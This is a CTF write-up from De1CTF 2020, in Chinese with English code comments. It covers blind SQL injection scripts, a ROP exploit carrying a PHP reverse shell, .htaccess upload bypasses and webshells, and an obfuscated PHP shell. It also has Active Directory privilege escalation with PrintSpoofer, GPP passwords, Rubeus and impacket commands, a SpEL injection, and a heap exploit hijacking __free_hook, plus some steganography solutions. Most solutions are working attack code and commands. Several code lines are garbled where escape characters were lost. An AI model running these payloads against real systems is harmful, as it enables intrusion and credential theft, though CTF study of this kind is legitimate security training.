mixture
解题思路
任何帐号密码都可以登录进去,看看功能点
http://134.175.185.244/member.php?orderby=5
过滤了& || if regexp ^ length union sleep hex unhex desc exp updatexml extractvalue
注入脚本
import requests
# Boolean-based blind extraction against member.php?orderby= (Python 2: print
# statements).  Each request injects an expression into the ORDER BY clause;
# the value of that expression changes the row order, so the response text is
# compared with a baseline page instead of looking for an error message.
# Defender's view: the app's keyword blacklist (see member.php below) leaves
# plenty of operators unblocked — only a whitelist of sort columns or a
# parameterised query removes the injection.  Traffic like this is easy to
# spot: hundreds of requests to one URL whose query string differs by a single
# character and carries information_schema / mid().
flag=''
# Session of a logged-in user: member.php is only reachable with a session.
cookies={'PHPSESSID':'cecvck53t45qs8nu85bh9d119r'}
url="http://49.51.251.99//member.php?orderby="
# Baseline response; any response that differs is treated as "condition true".
page=requests.get(url,cookies=cookies).text
for i in range(1,33):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz,':
        # One character of the column-name list per request; %2b is a URL-encoded '+'.
        payload="|(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1)='{}')%2b1".format(i,j)
        true_url=url+payload
        r=requests.get(true_url,cookies=cookies)
        if r.text!=page:
            print payload+' ok'
            flag+=j
            print flag
        else:
            print payload
账号admin 密码goodlucktoyou
拿到1.elf文件
search处可以得到源码
//index.php
<?php
// Login handler.  Only the username 'admin' is checked against a password;
// any other non-empty username/password pair is accepted and becomes a
// 'guest' session (this is why "any account/password logs in" above).
error_reporting(0);
include "config.php";
session_start();
if(!empty($_SESSION['user'])){
    // NOTE(review): header() without exit — the redirect is only a response
    // header; the script keeps running and still processes the POST below.
    header("location: /profile.php");
}
// Second session_start() on an already-active session: redundant (PHP
// notices it, but error_reporting(0) hides that).
session_start();
$username = $_POST['username'];
$password = $_POST['password'];
if(!empty($username)&&!empty($password)){
    if($username==='admin')
    {
        // Stored admin hash compared with unsalted MD5 of the input — fast to
        // brute-force offline; password_hash()/password_verify() would be the fix.
        $sql = "select password from member";
        $result = $mysqli->query($sql);
        $row = $result->fetch_row();
        if($row[0]===md5($password)){
            $_SESSION['user']='admin';
            $_SESSION['admin']=1;
            header("location: /profile.php");
        }
        else{
            echo "<script>alert('nononon,admin password not right')</script>";
        }
    }
    else{
        // Any non-admin credentials are accepted without verification.
        $_SESSION['user']='guest';
        $_SESSION['admin']=0;
        header("location: /profile.php");
    }
}
?>
//admin.php
<?php
include "profile.php";
session_start();
if(empty($_SESSION['user'])){
    // NOTE(review): header() without exit — an unauthenticated request is
    // redirected but the checks below still execute (and still emit output).
    header("location: index.php");
}
// Loose comparison (==) against the session flag; index.php only ever stores
// the integers 0/1 here, so it behaves like === as long as nothing else writes it.
if($_SESSION['admin']==1){
    phpinfo();
}
else{
    print <<<EOT
<div class="row">
<div class="col-md-6 col-md-offset-4">You are not admin!!!!</div>
</div>
EOT;
}
//member.php
<?php
include "profile.php";
include "config.php";
// Untrusted input: taken verbatim from the query string and spliced into SQL below.
$orderby = $_GET['orderby'];
?>
<?php
print <<<EOT
<div class="table-responsive">
<table class="table">
<!--orderby-->
<caption>ALLmember</caption>
<thead>
<tr>
<th>id</th>
<th>username</th>
<th>money</th></tr>
</thead>
<tbody>
EOT;
if(!empty($orderby)){
    // The only defence is a keyword blacklist.  NOTE(review): as printed the
    // pattern has empty alternatives ("|union||||&&|") and a bare '^', which
    // PCRE would match against every input — the escapes (\^, \|\|) were most
    // likely lost in transcription.  Either way a blacklist does not fix an
    // injection: accept only a whitelisted column name plus ASC/DESC instead.
    $blacklist = "/if|desc|sleep|rand|updatexml|^|union||||&&|regexp|exp|extractvalue|length|hex/i";
    if(preg_match($blacklist, $orderby))
        exit("No~~hacker!");
    // SQL injection: $orderby is concatenated straight into the ORDER BY clause.
    $sql = "SELECT * FROM users order by id ".$orderby;
    $result = $mysqli->query($sql);
    if($result===false){
        // A failing query silently falls back to the unordered listing, so
        // error text never reaches the client — but the row order (hence the
        // page text) still depends on whatever expression was injected, which
        // is the oracle the script above relies on.
        $sql="SELECT * FROM users";
    }
}
else{
    $sql = "SELECT * FROM users";
}
$result = $mysqli->query($sql);
while($row = $result->fetch_row()){
    //var_dump($row);
    // Row template; note the stray "<tr>" after "</tr>", which leaves one
    // unclosed <tr> per row in the emitted HTML.
    print <<<EOT
<tr>
<td>$row[0]</td>
<td>$row[1]</td>
<td>$row[2]</td></tr>
<tr>
EOT;
}
/* free result set */
$result->free();
$mysqli->close();
print <<<EOT
</tbody>
</table>
</div>
EOT;
?>
pwn_exp.py
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
"""
Author : Kirin
Date : 2020/05/04, 04:31
"""
import requests
import sys
import os
from pwn import *
# Python 2 only (shebang above; len(s)/8 below is integer division).
# Both addresses are absolute values observed in one specific run; with ASLR
# they change on every execution, so the chain is only valid for the exact
# process layout and libc build the author had.
libc_addr = 0x7f546eacb000 # libc address
shell_addr = 0x7ffd5b5ab000 # stack
# Gadget offsets relative to the libc base (build-specific).
pop_rdi = libc_addr+0x023a5f
mov_rdx_rdi = libc_addr+0xddc2a
pop_rdx = libc_addr+0x106725
# Command string passed to the final call.  NOTE(review): as printed this
# line is not valid Python — the inner quotes and the trailing NUL were
# originally escaped (\", \x00) and the backslashes were lost in
# transcription.  "xxxxx" is the author's placeholder for their own host.
s = "php -r '$sock=fsockopen("xxxxx",9981);exec("/bin/bash -i <&3 >&3 2>&3");'x00"
pop4_ret = libc_addr+0x0000000000024568
# ROP chain: padding, then one 8-byte slice of s stored per loop iteration,
# then the libc function at base+0x0449c0 called with shell_addr as rdi.
payload = p64(pop_rdx)*10+p64(pop4_ret)+p64(0)*4
for i in range(len(s)/8+1):
    payload += p64(pop_rdx)
    payload += p64(shell_addr+i*8)
    payload += p64(pop_rdi)
    payload += s[i*8:i*8+8].ljust(8, "x00")   # "x00" is "\x00" (same transcription loss)
    payload += p64(mov_rdx_rdi)
payload += p64(pop_rdi)+p64(shell_addr)
payload += p64(libc_addr+0x0449c0)
def local():
    """Post the overflow payload to a local test harness and print the reply.

    NOTE(review): ``global INITIAL`` is declared but never read or written
    (same in remote()).  Here the payload travels as query-string parameter
    ``x`` (``params=``) while remote() sends a form field — presumably two
    different harnesses; confirm before reusing.
    """
    global INITIAL
    # 0x88 filler bytes, presumably up to the saved return address, then the chain.
    filename = "a"*0x88+payload
    data = {
        "x": filename,
    }
    url = "http://127.0.0.1:8087"
    r = requests.post(url, params=data)
    print r.content  # Python 2 print statement
def remote():
    """Post the same payload to the challenge's select.php as form field ``search``.

    The PHPSESSID is the author's own session on the target (taken from the
    page); ``global INITIAL`` is unused here as well.
    """
    global INITIAL
    filename = "a"*0x88+payload
    data = {
        "search": filename,
    }
    url = "http://134.175.185.244/select.php"
    r = requests.post(url, data=data, cookies={
        "PHPSESSID": "5eatvn82eb51nhkc7vj7j12ud1"})
    print r.content  # Python 2 print statement
remote()  # fires unconditionally when the script is run (or imported); no __main__ guard
readflag.php
<?php
// Drives /readflag: reads its output, evaluates the expression it prints,
// writes the answer back on stdin and dumps the rest of the output.
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("file", "/tmp/.orzzzzz", "a"),  // child's stderr appended to a file
);
$process = proc_open("/readflag", $descriptorspec, $pipes, "/", array());
if (is_resource($process)) {
    // Two reads: presumably a banner/prompt first, then the line holding the
    // expression — the array variable is reused for the string (confusing; a
    // separate name would be clearer).
    $descriptorspec = fread($pipes[1], 1024);
    $descriptorspec = fread($pipes[1], 1024);
    var_dump($descriptorspec);
    // NOTE(review): "n" is most likely "\n" with the backslash lost in
    // transcription; as printed, explode() splits on the letter n.
    $ccc = explode("n", $descriptorspec)[0];
    var_dump($ccc);
    // eval() on text read from a child process — acceptable here only because
    // /readflag is the trusted challenge binary, never for output an outside
    // party can influence.  NOTE(review): inside double quotes "$result" is
    // interpolated (empty), so the evaluated code would be " = <expr>;"; the
    // original was presumably "\$result = $ccc;".
    eval("$result = $ccc;");
    print_r("$result = $ccc;");
    print_r($result);
    fwrite($pipes[0], "$resultn");  // presumably "$result\n"; as printed, $resultn is an undefined variable
    var_dump(fread($pipes[1], 1024));
    var_dump(fread($pipes[1], 1024));
    var_dump(fread($pipes[1], 1024));
    fclose($pipes[0]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
}
perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!
考点推测是.htaccess getshell,绕一下过滤,上传.htaccess文件后uploads的对应目录会500
Content-Disposition: form-data; name="fileUpload"; filename="xx.txt"
Content-Type: image/jpeg
<?=`$_GET[1]`;
xx.txt?1=cat /flag;
其他payload
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg
AddType application/x-httpd-p
hp .qiu
Content-Disposition: form-data; name="fileUpload"; filename="1.qiu"
Content-Type: image/jpeg
<?=eval($_POST[1]);
Hard_Pentest_1
shell:
<?=$_=[]?>
<?=$_="$_"?>
<?=$_=$_['!'=='@']?>
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?><?=$__++?>
<?=$__++?><?=$__++?>
<?=$____=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$_____________=$__++?><?=$__++?>
<?=$__________=$__++?>
<?=$_________=$__++?>
<?=$__++?>
<?=$________=$__++?>
<?=$_____=$__++?>
<?=$______=$__++?>
<?=$______?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____________=$__++?>
<?=$_____.$____________.$_____.$______.$____.$_____________?>
<?=$________________=$_____.$____________.$_____.$______.$____.$_____________?>
<?=$_________.$__________.$_____.$______?>
<?=($________________)(${'_'.$_________.$__________.$_____.$______}{!!'@'})?>
拿到shell以后发现是域内机器,扫描域控的共享,查看共享得知几个目录
在Hint里找到一个zip,但是有密码
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>
之后在SYSVOL中找到策略的密码,解密之后即为zip密码
https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/
C:\web\uploads\line> net group /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.
Group Accounts for \\dc.De1CTF2020.lab
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
非预期提权
PrintSpoofer.exe -c "cmd.exe /c net user line LINEline123.. /ad"
预期提权
利用Kerberoasting获取到delta用户的哈希,之后进行本地爆破即可获得密码
根据bloodhound可以看到delta用户对dm主机可以进行写操作
于是就可以给dm委派delta为管理员
首先查看delta用户的sid
得到delta的sid为 S-1-5-21-1806179181-549835139-1294087714-1106
之后修改dm的委派,允许delta用户操作dm
O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1806179181-549835139-1294087714-1106)
此处我先使用PS脚本但是没跑通,猜测可能是当前权限为web的原因
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1806179181-549835139-1294087714-1106)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dm| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
然后使用Rubeus获取密码哈希,也可以使用之前抓到的哈希
Rubeus.exe hash /user:de1ta /password:3f23ea12 /domain:DE1CTF2020.LAB
然后使用哈希生成访问smb的白银票据,需要分别生成cifs服务和host服务两个的票据
Rubeus.exe s4u /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /impersonateuser:administrator /msdsspn:cifs/dc /ptt
Rubeus.exe s4u /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /impersonateuser:administrator /msdsspn:host/dc /ptt
查看生成的票据
klist
之后使用impacket生成delta的访问凭据
getST.py -dc-ip 192.168.0.12 -spn cifs/dm -impersonate administrator De1CTF2020.lab/de1ta:3f23ea12
有了票据以后,使用这个票据即可获得最高权限
psexec.py de1ta:3f23ea12@192.168.0.11
原本考的是dcshadow
不过似乎有人已经完成了权限的同步,导致delta权限直接就是域管,直接上车,真香
涉及工具
https://github.com/GhostPack/Rubeus
https://github.com/SecureAuthCorp/impacket/
https://github.com/PowerShellMafia/PowerSploit 注意使用dev分支
cobalt strike
msf
参考资料
https://xz.aliyun.com/t/7454
http://blog.nsfocus.net/analysis-attacks-entitlement-resource-constrained-delegation/
https://www.secpulse.com/archives/70892.html
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
calc
解题思路
el表达式注入:
GET /spel/calc?calc=neW+java.util.Scanner(neW+java.io.File('/flag')).next() HTTP/1.1
Host: 106.52.164.141
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Referer: http://106.52.164.141/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Misc杂烩
解题思路
流量包里有几张图片
要分离出唯一的一个png文件
找到一个云盘地址
https://drive.google.com/file/d/1JBdPj7eRaXuLCTFGn7AluAxmxQ4k1jvX/view
可以下载一个word文件
word文件中藏了一个压缩包需要密码
word中还有两张图
爆破压缩包,六位 DE开头
爆破得到: DE34Q1
binwalk分离一下:发现有一个压缩包,里面有文件666.jpg:fffffffflllll.txt 为flag
mc_joinin
解题思路
nmap 扫描之后发现服务器版本为20.20, 协议版本为997, mc连接服务器过程中会向服务器发送自己的协议版本, 目前mc最高版本1.15.2,协议版本为 578, 所以题目思路为伪造 mc 版本
使用 https://github.com/Tnze/go-mc 这个库, 将其 bot/mcbot.go 中 ProtocolVersion 变量改为 997, 然后引包, 连接:
// main connects to the challenge server with the patched protocol version
// (ProtocolVersion changed to 997 in bot/mcbot.go, see the text above) and
// logs success or aborts on the first error.
func main() {
	client := bot.NewClient()
	if err := client.JoinServer("222.85.25.41", 25565); err != nil {
		log.Fatal(err)
	}
	log.Println("Login success")
}
wireshark抓包即可看到
"text":"\n\nHIDE FLAG ONE\n\n imgur.com/a/ZOrErVM \n\n"
进入该地址得到一张图片, 经 F11st 师傅提醒, 在 ps 中打开, 调至红色通道即可
life
解题思路
分离出一张图
一个压缩包需要密码
生命游戏了解一下https://blog.csdn.net/u011439689/article/details/17226237
已经撸上去了。地址和数据如下,导入使用中以上尺寸,放置在中心位置
https://funnyjs.com/jspages/game-of-life.html
#N Temp data by Javascript Robot
x = 27,y = 27, rule = 23/3
13bo2$2bo10bo$5bobo2bobo4bo2bob2o$3b2obob2o2bob4ob2o2bo$3bobobobobo5bob
2obo$bobo5bo5b2o7bo$3b2obob2ob2o2bobobo2bo$3bobobobobob2o2b2ob2o2bo$4b
obobo4bo3bo2b2obo$3bo5bob2o2b2o7b3o$7b4o3bob2o2b2ob2obo$2bobo2bo6bo3b2o5b
o$5b3o2bob2o3bo2b2obob2o$2bobo2b2ob2o3bo6bo2b2o$3bob4o3b2obo2b4o3bo$5b
2o6b2o2bobobobob2o$4bo2b2o2b3o2bobobob2ob2o$2b2o4b2o2bobo4bo3bo2bo$6bo2b
obo3bob2o6b2o$3o2b2o2bo2b2o3bo2b4ob2o$b3o2bo3bob3obo3bobo2bo$o7bo3bo4b
2obo2bob2o$o2bo6bo2bo4b2o4b2o$obob4obo2b7o2b2o2bo$o3b7ob2ob2o2b7o$2bo2b
o4b4o2b3obobo2b2o$!
单步一轮以后
扫描之后密码为AJTC8ADEVRA13AR 解开压缩包内容为
0QjN1MTM0MTN0QjN3ImNjNzM3QTNmdTN3MTNmdzMzcjNxcjM3QTNmdDN2gzMzUjZ2czM0YDZzMjMxcDZ
丢到cyberchef
easy_bgm
解题思路
访问网站下载背景音乐bgm.mp3
尝试了各种隐写都不行。偶然得知有一种private位隐写
参考资料https://www.cnpanda.net/ctf/342.html
尝试之后获取到一些数据
import re
import binascii
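n = 0x28a3  # byte offset of the first MP3 frame header to examine
result = ''
FRAME_STRIDE = 0x1a1  # distance between consecutive frame headers (presumably a constant-bit-rate stream)
FRAME_COUNT = 3284    # number of frame headers to dump


def w(s):
    """Append *s* as one line to 1.txt (one frame header per line).

    Bug fix: the original wrote the letter "n" after each entry; a real
    newline is what the later "one bit per line" editing step expects.
    """
    with open("1.txt", "a+") as f:
        f.write(s + "\n")


def frame_header_bits(frame_hdr):
    """Return the 32-bit big-endian binary string of a 4-byte frame header.

    Zero-padded to 32 characters so that bit positions (the 24th bit is
    selected by hand afterwards) stay stable even when the header starts
    with a 0 bit; the original bin(int(...)) form dropped leading zeros.
    """
    hex_data = binascii.b2a_hex(frame_hdr).decode("utf8")
    return "{:032b}".format(int(hex_data, 16))


if __name__ == "__main__":
    with open('bgm.mp3', 'rb') as fh:  # closed on exit; the original handle was never closed
        for i in range(0, FRAME_COUNT):
            fh.seek(n, 0)
            frame_hdr = fh.read(4)
            if len(frame_hdr) < 4:
                # Ran past end of file: stop instead of raising on int("", 16).
                break
            w(frame_header_bits(frame_hdr))
            n += FRAME_STRIDE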
生成1.txt之后用vscode打开多行编辑选中第24比特复制出来,然后计算长度,选择最靠近的长度为336bit,多余的0删掉。得到
101111101000010010101110011010101000001001010110110011000010001011111010001000101000110001001110000011001110101011111010001011100110001000101100010010101100001011001100111011001001011010110010111110100000110000101110111110101100110010110110000011001100011010001100110011001110101011011110011000100010101011000010100011001010011000100010
反转得到
010001000110010100110001010000110101010001000110011110110101011100110011001100010110001100110000011011010011001101011111011101000011000001011111010011010110100100110111001100110100001101010010001101000100011001110100010111110101011100110000011100100011000101000100010111110100010000110011011010100100000101010110011101010010000101111101
直接转ascii得到flag
stl_container
解题思路:
from PwnContext import *
from pwn import *
from LibcSearcher import *
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
# Short aliases over the PwnContext tube `ctx`; str() so ints can be sent as-is.
s = lambda data :ctx.send(str(data)) #in case that data is an int
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
# NOTE(review): 'x00' is "\x00" with the backslash lost in transcription; as
# printed, ljust() would reject the 3-character fill string.
uu32 = lambda data :u32(data.ljust(4, 'x00'))
uu64 = lambda data :u64(data.ljust(8, 'x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
ctx.binary = 'stl_container'
# Local libc used for symbol offsets; the exploit assumes the service runs
# the same build (the constants further down were measured against it).
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ctx.debug_remote_libc = False
local=0  # 0 = connect to the remote service (see choice()); 1 = run the binary locally
def choice():
    """Start the tube and return it.

    With the module-level ``local`` flag set the binary is started locally;
    otherwise the service address is stored in ``ctx.remote`` first and a
    remote connection is opened.
    """
    if not local:
        ctx.remote = ('134.175.239.26', 8848)
        return rs('remote')
    return rs()
def debug():
    """Attach the debugger with the two fixed breakpoints (local runs only).

    Does nothing unless ``local == 1``; prints the libc base first so the
    addresses in the debugger session can be related to the leaks.
    """
    if local != 1:
        return
    libc_base = ctx.bases.libc
    print(hex(libc_base))
    ctx.symbols = {'sym1': 0xEDA, 'sym2': 0x10AF}
    ctx.breakpoints = [0xEDA, 0x10AF]
    ctx.debug()
def menu(index):
    """Select entry *index* on the program's top-level ">> " menu."""
    prompt = ">> "
    sla(prompt, index)
def submenu(index):
    """Select entry *index* on a container's ">> " sub-menu."""
    prompt = ">> "
    sla(prompt, index)
def List(index, tpe, data):
    """Drive the list container (menu 1).

    ``tpe`` 1 sends *data* at the "input data:" prompt; ``tpe`` 2 and 3
    answer the "index?" prompt with *index*.  Other values only pick the
    sub-menu entry.
    """
    menu(1)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 2 or tpe == 3:
        sla("index?", index)
def Vector(index, tpe, data):
    """Drive the vector container (menu 2).

    ``tpe`` 1 sends *data* at the "input data:" prompt; ``tpe`` 2 and 3
    answer the "index?" prompt with *index*.  Other values only pick the
    sub-menu entry.
    """
    menu(2)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 2 or tpe == 3:
        sla("index?", index)
def Queue(index, tpe, data):
    """Drive the queue container (menu 3).

    ``tpe`` 1 sends *data* at the "input data:" prompt; ``tpe`` 3 answers
    the "index?" prompt with *index*.  Other values only pick the sub-menu
    entry.
    """
    menu(3)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 3:
        sla("index?", index)
def Stack(index, tpe, data):
    """Drive the stack container (menu 4).

    ``tpe`` 1 sends *data* at the "input data:" prompt; ``tpe`` 3 answers
    the "index?" prompt with *index*.  Other values only pick the sub-menu
    entry.
    """
    menu(4)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 3:
        sla("index?", index)
choice()  # open the tube (remote unless local is set)
# Container calls are (index, sub-menu, data).  The 0xa0 sizes and the
# constants 0x125e0 / (0x7ffff77d7ca0-0x7ffff73ec000) are offsets measured on
# the author's setup and hold only for that binary and libc build.
Vector(1,1,"f"*0x10+p64(0xa0))
Vector(1,1,"f"*0x10+p64(0xa0))
List(1,1,"w"*0x10+p64(0xa0))
Vector(0,2,0)
Vector(0,2,0)
Vector(0,1,"xf0")   # "\xf0" — backslash lost in transcription (same for "x00" below)
Vector(0,3,0)
ru("data: ")
# A heap pointer comes back through the vector "show" path; its distance from
# the heap base is the measured constant.
heap_base=uu64(r(6))-0x125e0
leak("heap_base",heap_base)
Queue(0,1,p64(heap_base))
Queue(0,1,p64(0)+p64(7)+p64(0)*1+p64(0xa0)+p64(heap_base+0x20)+p64(0)*11+p64(heap_base+0x20))
Vector(0,3,0)
ru("data: ")
# Second leak, read the same way, converted to the libc base with the offset
# measured against the local libc named above.
libc_base=uu64(r(6))-(0x7ffff77d7ca0-0x7ffff73ec000)
leak("libc_base",libc_base)
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
# __free_hook is pointed at system() and "/bin/sh" placed in a chunk, so the
# program's next free() of it presumably runs the shell.  Mitigation note:
# glibc 2.34 removed __free_hook, so this step only applies to older builds.
List(1,1,p64(free_hook))
Stack(0,1,p64(system))
Vector(0,1,"/bin/shx00")
debug()
irt()
本文作者:ChaMd5安全团队
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/130490.html